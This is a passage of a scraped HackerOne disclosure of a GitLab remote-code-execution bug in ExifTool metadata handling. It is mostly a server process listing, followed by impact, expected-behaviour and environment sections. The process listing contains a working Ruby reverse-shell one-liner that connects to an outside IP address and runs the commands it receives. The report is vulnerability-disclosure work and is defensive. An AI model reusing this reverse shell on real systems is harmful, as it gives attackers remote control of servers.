0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T11:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T11:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T11:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQX36NCXFV%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T112946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHsaCXVzLXdlc3QtMiJHMEUCIQDPFuWXycybyGsyj1GCHE186W9N89xiKPCppFWcwIPFVQIgZ7H1dLeFs1URukoKpTu7pGeR1n1nG4Lj8W93mplLNG4q%2BgMIFBACGgwwMTM2MTkyNzQ4NDkiDKPDfX7K8s%2BIUqq30yrXA4vclxO02xYgU9muEEG1mQE0FxfPIkJXTXbOeQhKClzE%2BP80M61GDyynzuxwCzfPAhuCOGS4k7ETSt5CiW1OQKNqfxBNdGp2f9adg7dnSkJBAI9Y5GIANSa6BceNeqCoM5REGS%2BOU5qCGvFo0vUSZEJSTWXsbsxH30noj4rvVPDk049NDCRJ%2FSNyU4HVp6gIELFV70escaTLUUeQ54zBItKLSpF3xUA%2FBQFhMB40d5X%2BhMwGruvpBcF5%2BdYD%2F95M4N1aEeOAMb9lZviXRebHnZho%2FKbyNNPEe2xp9RMwrDh%2Bu3DUNPR5r4Ntqg67IHuXI6AhGYK2dk5dURnXQ5gEoXsf6jMDC6vjDy9DsOKcWfC70kDG%2BOhUF0jF8cf5NLAPJUMy99cq9xy5UcY0RPJcahJb9bo8tKvevVMy%2FGPhYUuIaXlsP1lzfQKVBpyKi%2BGQ5Ta7jFQrLuKSeDgghNc5b9XAsXZkrVoqUz8Epforucvo1fZ2iBg3FF382%2B%2B%2B7zfVYGfNk3R1u%2B3otLp9VjF2GrSHwkUy9EF45mLvCTlgUQnqEV2IUYhdQehSir9jsZ1K2jTvwfsq7GxlVHYKUnOLd%2F94ry3cnHQQthC2gjY1BgrUIxvQg%2BA3WzDSx%2F6EBjqlAYhS66dVC%2F7WQFVpdqvURJj99DAO6fM1pfJx8ARFYHOd1ZuZsYPDfM6LM%2FzMU1hEcZHJeA7SMlQIQd5yOUdJleYRs%2FFdIZJC6lsqrbvhFu3to7w%2B0bVhXNeXVpCGlDN07NZwpbEY5J1IqCqlYYqsjzO8c7pOM1JHy%2Fj5NqIyViFYR4pIvWVPGbdH9mPVD4pQ06K3wU%2FrT%2BNtHBamsmhXy7YH0x7bVA%3D%3D&X-Amz-Signature=94da4c081a25e1308c2c1c41b367835185d990065a641afe23260c1d364a5724"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T11:29:47", "differentElements": ["h1reporter"], "edition": 16}, {"bulletin": {"id": "H1:1154542", "hash": "3a62dd44f598a29d9ddae453f3911b8f", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions 